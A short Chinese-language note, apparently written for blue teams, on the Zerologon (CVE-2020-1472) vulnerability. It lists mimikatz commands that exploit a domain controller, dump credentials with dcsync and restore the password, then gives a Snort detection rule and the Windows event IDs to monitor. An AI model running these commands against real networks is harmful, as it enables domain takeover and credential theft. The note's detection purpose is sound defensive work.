0x01 前言

mimikatz 20200918版本支援通過zerologon漏洞攻擊域控伺服器。下載連結如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix

官方利用截圖如下

mimikatz相關命令

1. lsadump::zerologon /target:dc.hacke.testlab /account:dc$ poc
2. lsadump::zerologon /target:dc.hacke.testlab /account:dc$ /exploit 通過zerologon漏洞攻擊域控伺服器
3. lsadump::dcsync
4. lsadump::postzerologon /target:conttosson.locl /account:dc$ #
   恢復密碼

snort 檢測規則

alert tcp any any -> any ![139,445] (msg:"Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content:"|00|"; offset:2; content:"|0f 00|"; distance:22; within:2; fast_pattern; content:"|00 00 00 00 00 00 00 00 ff ff 2f 21|"; within:90; reference:url,https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2; metadata:created_at 2020_09_19;)
 

pcap包

利用zerologon漏洞攻擊域控的資料包，方便同學們寫完規則做測試
pcap github下載地址

windows事件管理器自查

在未打補丁的域控，重點檢視windows事件管理器中，eventid為4742或者4624

在windows 8月更新中，新增事件ID 5829，5827，5828，5830，5831。藍隊可以重點關注這幾個事件ID以方便自查

1. 當在初始部署階段允許存在漏洞的Netlogon安全通道連線時，將生成事件ID 5829。
2. 管理員可以監控事件ID 5827和5828，這些事件ID在存在漏洞的Netlogon連線被拒絕時觸發
3. 5830，5831 如果“域控制器：允許易受攻擊的Netlogon安全通道連線”組策略允許連線。

mimikatz通過zerologon攻擊成功後，將會留下事件id為4648。

參考

1. How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472
2. Detecting the Zerologon vulnerability in LogPoint
3. https://gist.githubusercontent.com/silence-is-best/435ddb388f872b1a2e332b6239e9150b/raw/8064d33f62d5983130d3d946aac28ea00aaf6c4a/gistfile1.txt